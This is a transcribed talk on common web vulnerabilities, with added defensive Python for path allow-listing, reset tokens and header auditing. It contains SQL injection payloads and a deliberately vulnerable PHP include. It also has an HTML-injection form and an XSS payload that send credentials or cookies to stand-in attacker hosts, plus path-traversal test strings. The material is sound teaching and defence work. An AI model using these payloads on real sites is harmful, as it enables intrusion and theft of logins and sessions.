QA Fest 2019. Сергій Короленко. Top web vulnerabilities in 40 minutes
Let's talk about the most common mistakes made by web application developers and how an attacker can turn them to their advantage. We will cover as much material as possible in a short period of time.

Published in: Education

  1. KYIV 2019. Короленко Сергій. All vulnerabilities in web applications
  2. Bugcrowd's Vulnerability Rating Taxonomy
  3. RCE: Remote Code Execution | Code injection
  4. RCE: Remote Code Execution | Code injection
  5. SQL Injection
  6. SQL Injection
  7. SQL Injection
  8. SQL Injection
  9. SQL Injection
  10. SQL Injection: techniques and the example payloads shown on the slide
      - Stacked queries: 1; SELECT version()--
      - UNION query-based: 1 UNION ALL SELECT NULL,version()--
      - Error-based: 1 AND(SELECT 1 FROM(SELECT COUNT(*),concat(version(),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a)--
      - Boolean-based blind: 1 AND (ascii(substr((SELECT version()),1,1))) > 52--
      - Time-based blind: 1 AND IF((SELECT ascii(substr(version(),1,1))) > 53,sleep(10),NULL)--
  11. XXE | XML external entity injection
  12. FILE INCLUSION (the user-controlled parameter goes straight into include())
      <?php
      $file = $_GET['file'];
      include("/var/www/backend/$file");
      ?>
      https://example.com/?page=contact.php
  13. DIRECTORY TRAVERSAL
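Slides 12 and 13 show the root cause of both file inclusion and directory traversal: a request parameter is concatenated into a filesystem path. The following Python example is added here and is not code from the talk or its author; it shows the defender-side fix, an allow-list of known page names with a path-containment check as defence in depth. BACKEND_DIR, ALLOWED_PAGES, the sample inputs and the function names are constructed assumptions for the demonstration, and nothing is read from disk.

```python
import posixpath

# Constructed sample values: the directory the vulnerable include() on the slide is
# rooted in, and the page names this hypothetical application actually serves.
BACKEND_DIR = "/var/www/backend"
ALLOWED_PAGES = frozenset({"index.php", "contact.php", "about.php"})


def is_contained(base_dir: str, user_path: str) -> bool:
    """Containment check: after normalisation, does base_dir/user_path still lie
    inside base_dir? Rejects '../' sequences and absolute paths alike."""
    base = posixpath.normpath(base_dir)
    candidate = posixpath.normpath(posixpath.join(base, user_path))
    return posixpath.commonpath([base, candidate]) == base


def resolve_page(page: str, base_dir: str = BACKEND_DIR, allowed=ALLOWED_PAGES):
    """Safe replacement for include("/var/www/backend/$file") with $file taken
    straight from the request. Returns the path to include, or None if rejected.

    Layer 1: allow-list of known page names (the real fix: the client chooses
             from a menu and never supplies a path).
    Layer 2: containment check as defence in depth, so a careless future entry
             in the allow-list such as "../shared/x.php" is still refused.
    Null bytes are refused explicitly because C-backed file APIs truncate at them.
    """
    if not page or "\x00" in page:
        return None
    if page not in allowed:
        return None
    if not is_contained(base_dir, page):
        return None
    return posixpath.join(base_dir, page)


def triage(requests):
    """Run a batch of ?page= values through resolve_page and report, per value,
    the path that would be served or None. Handy as a regression test."""
    return {p: resolve_page(p) for p in requests}


if __name__ == "__main__":
    # Constructed inputs covering the legitimate case and the usual bypass shapes.
    SAMPLE = [
        "contact.php",                 # legitimate page from the allow-list
        "../../../../etc/passwd",      # classic traversal (slide 13)
        "/etc/passwd",                 # absolute path instead of a page name
        "....//....//etc/passwd",      # doubled-dot variant aimed at naive filters
        "contact.php\x00.jpg",         # null-byte truncation trick
        "admin.php",                   # plausible file name, but not on the menu
    ]
    for page, result in triage(SAMPLE).items():
        print(f"{page!r:32} -> {result or 'REJECTED'}")
```

The allow-list alone already blocks every malicious input above; the containment check exists so that the security of the endpoint does not rest on a single list that someone will edit later.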
  14. UNSAFE FILE UPLOAD
  15. UNSAFE FILE UPLOAD
  16. CRLF injection (CRLF, \r\n, %0D%0A)
  17. HTML Injection
      Hi! My name is <h1>hacker</h1>
      (renders as: Hello HACKER)
      Hi! My name is <h1>Log in to view a content</h1>
      <form action="http://evil.com">
        Username: <input name="username"><br>
        Password: <input name="password"><br>
        <input type="submit">
      </form>
  18. XSS | Cross Site Scripting
  19. XSS Stored/Reflected
  20. XSS | Cross Site Scripting
      www.welp.com?search=<script>window.location="http://www.haxxed.com?cookie="+document.cookie</script>
  21. Open Redirection
      https://bank.com/redirect.php?go=http://attacker.com/phish/
  22. CSRF | Cross-Site Request Forgery
      http://bank.com/transfer?amount=50.0&from=4165**02&to=7893-1892-2940-4280
      http://bank.com/transfer?amount=50.0&from=4165**02&to=4153-1802-9420-4483
  23. CSRF | Cross-Site Request Forgery
  24. SSRF | Server Side Request Forgery
      http://example.com/?url=http://localhost/server-status
  25. Default Credentials/Configuration
  26. Authentication Bypass
  27. Weak Password Policy
  28. Weak password reset question/answer
  29. Weak password change/reset (predictable tokens)
      http://bank.com/reset_password?email=ololo@example.com&token=1561324612
      http://bank.com/reset_password?email=ololo@example.com&token=1561324754
      http://bank.com/reset_password?email=ololo@example.com&token=1561324698
      MD5("ololo@example.com") = 83fa8dbfe2725ff513c4028a7f60df36
      http://bank.com/reset_password?email=ololo@example.com&token=83fa8dbfe2725ff513c4028a7f60df36
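Slide 29 shows two weak reset-token designs: tokens that are plain timestamps, and a token that is just the MD5 of the e-mail address, so anyone who knows the address can build it. The following Python example is added here and is not the speaker's code; it implements the properties a reset token needs (unguessable, stored only as a hash, bound to one account, time-limited, single-use, compared in constant time) and includes a small audit helper that flags the two weak patterns from the slide. The in-memory store, the e-mail address reused from the slide, the injected clock and the 15-minute lifetime are constructed assumptions.

```python
import hashlib
import hmac
import secrets
import time

TOKEN_TTL_SECONDS = 15 * 60   # assumed lifetime; long enough to read the e-mail, no more


class ResetTokenStore:
    """In-memory stand-in for the table of pending password resets.

    Only SHA-256(token) is stored, so a database leak does not hand out live tokens.
    The clock is injectable so expiry can be exercised deterministically."""

    def __init__(self, clock=time.time):
        self._clock = clock
        self._pending = {}   # email -> (token_hash, expires_at)

    @staticmethod
    def hash_token(token: str) -> str:
        return hashlib.sha256(token.encode()).hexdigest()

    def issue(self, email: str) -> str:
        """Create a fresh token for this account, replacing any earlier one."""
        token = secrets.token_urlsafe(32)   # 256 bits from the OS CSPRNG, 43 chars
        self._pending[email] = (self.hash_token(token), self._clock() + TOKEN_TTL_SECONDS)
        return token

    def redeem(self, email: str, token: str) -> bool:
        """True exactly once per issued token, and only before it expires."""
        entry = self._pending.get(email)
        if entry is None:
            return False
        token_hash, expires_at = entry
        if self._clock() > expires_at:
            del self._pending[email]
            return False
        if not hmac.compare_digest(token_hash, self.hash_token(token)):
            return False           # wrong token: leave the pending reset in place
        del self._pending[email]   # single use
        return True


def looks_guessable(token: str, email: str, now: float) -> bool:
    """Audit helper for the two patterns on the slide: the token equals MD5(email),
    or it is a bare Unix timestamp within a week of 'now'."""
    if token.lower() == hashlib.md5(email.encode()).hexdigest():
        return True
    if token.isdigit() and abs(int(token) - now) < 7 * 24 * 3600:
        return True
    return False


def walkthrough():
    """Exercise the store with a constructed clock; returns the outcome of each step."""
    now = [1_561_324_612.0]               # constructed starting time
    store = ResetTokenStore(clock=lambda: now[0])
    email = "ololo@example.com"           # address reused from the slide

    token = store.issue(email)
    results = {
        "wrong_token": store.redeem(email, "83fa8dbfe2725ff513c4028a7f60df36"),
        "first_use": store.redeem(email, token),
        "replay": store.redeem(email, token),
    }
    token2 = store.issue(email)
    now[0] += TOKEN_TTL_SECONDS + 1        # let the second token expire
    results["expired"] = store.redeem(email, token2)
    return results


if __name__ == "__main__":
    for step, ok in walkthrough().items():
        print(f"{step:12} -> {'accepted' if ok else 'refused'}")
    print("timestamp token guessable:", looks_guessable("1561324612", "x@example.com", 1_561_324_700.0))
```

Binding the token to the e-mail address in the lookup means a token issued for one account cannot be replayed against another, which is the other half of what slide 32 (Broken Access Control) is about.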
  30. Bypass 2FA
  31. Privilege Escalation
  32. Broken Access Control
      http://bank.com/admin/reset_password?user=ololo@example.com&newpass=3.1415pec!
  33. COOKIES Attributes
  34. Session Fixation
  35. Sensitive Data Exposure: passwords, API keys, /.git/
  36. Directory Listing; DirSearch (backups, logs, etc.)
  37. Unencrypted Communication
  38. Privileged user: uid=0(root)
      No Rate Limits
      CAPTCHA Bypass
  39. Security Headers
      • Server headers that protect against attacks
        ◦ HTTP Strict Transport Security
        ◦ Content Security Policy
        ◦ Access-Control-Allow-Origin
        ◦ X-Frame-Options
        ◦ X-XSS-Protection
        ◦ X-Content-Type-Options
      • Server headers that leak information
        ◦ Server
        ◦ X-Powered-By
        ◦ X-AspNet-Version
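Slide 39 splits response headers into those that protect the client and those that leak information about the server. The following Python example is added here and is not part of the deck; it audits a captured set of response headers against both lists and also checks the values, since a header that is present but set weakly (a short HSTS max-age, a permissive CORS origin, a CSP that allows unsafe-inline) gives little protection. The two sample responses, the one-year HSTS threshold and the function names are constructed assumptions for the demonstration.

```python
# Protective headers from the slide, with Access-Control-Allow-Origin handled
# separately because its presence is not the point, its value is.
PROTECTIVE = (
    "Strict-Transport-Security",
    "Content-Security-Policy",
    "X-Frame-Options",
    "X-Content-Type-Options",
    "X-XSS-Protection",
)
LEAKING = ("Server", "X-Powered-By", "X-AspNet-Version")
ONE_YEAR = 365 * 24 * 3600   # assumed minimum HSTS max-age


def hsts_max_age(value: str):
    """Extract max-age from an HSTS header value; None if absent or malformed."""
    for directive in value.split(";"):
        name, _, num = directive.strip().partition("=")
        if name.lower() == "max-age" and num.strip().isdigit():
            return int(num.strip())
    return None


def audit_headers(headers):
    """Audit a dict of response headers (names matched case-insensitively, as in HTTP).
    Returns {"missing": [...], "weak": [...], "leaking": {name: value}}."""
    lower = {k.lower(): v.strip() for k, v in headers.items()}
    missing = [h for h in PROTECTIVE if h.lower() not in lower]
    weak = []

    hsts = lower.get("strict-transport-security")
    if hsts is not None:
        age = hsts_max_age(hsts)
        if age is None or age < ONE_YEAR:
            weak.append("Strict-Transport-Security: max-age missing or shorter than one year")

    xcto = lower.get("x-content-type-options")
    if xcto is not None and xcto.lower() != "nosniff":
        weak.append("X-Content-Type-Options: value is not 'nosniff'")

    xfo = lower.get("x-frame-options")
    if xfo is not None and xfo.upper() not in ("DENY", "SAMEORIGIN"):
        weak.append("X-Frame-Options: value is neither DENY nor SAMEORIGIN")

    if lower.get("access-control-allow-origin") == "*":
        weak.append("Access-Control-Allow-Origin: * lets any origin read the response")

    csp = lower.get("content-security-policy", "")
    if "unsafe-inline" in csp or "unsafe-eval" in csp:
        weak.append("Content-Security-Policy: allows unsafe-inline or unsafe-eval")

    leaking = {h: lower[h.lower()] for h in LEAKING if h.lower() in lower}
    return {"missing": missing, "weak": weak, "leaking": leaking}


# Two constructed responses: a stock deployment and a hardened one.
DEFAULT_RESPONSE = {
    "Server": "Apache/2.4.29 (Ubuntu)",
    "X-Powered-By": "PHP/7.2.24",
    "Content-Type": "text/html; charset=UTF-8",
    "Access-Control-Allow-Origin": "*",
}
HARDENED_RESPONSE = {
    "Content-Type": "text/html; charset=UTF-8",
    "Strict-Transport-Security": "max-age=63072000; includeSubDomains",
    "Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'",
    "X-Frame-Options": "DENY",
    "X-Content-Type-Options": "nosniff",
    # Kept because the slide lists it; current browsers no longer act on it, so
    # the CSP above is what actually limits script injection.
    "X-XSS-Protection": "1; mode=block",
}

if __name__ == "__main__":
    for label, resp in (("default", DEFAULT_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        report = audit_headers(resp)
        print(f"== {label} ==")
        print("  missing:", report["missing"])
        print("  weak:   ", report["weak"])
        print("  leaking:", report["leaking"])
```

The same function can be pointed at the headers of any real response (for instance the dict returned by an HTTP client library), which makes it a cheap check to drop into a QA pipeline for the headers slide 39 lists.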
  40. Detailed Error
  41. https://www.youtube.com/OWASPKyiv
      https://www.facebook.com/owaspkyiv
      https://owasp.slack.com/messages/chapter-ua/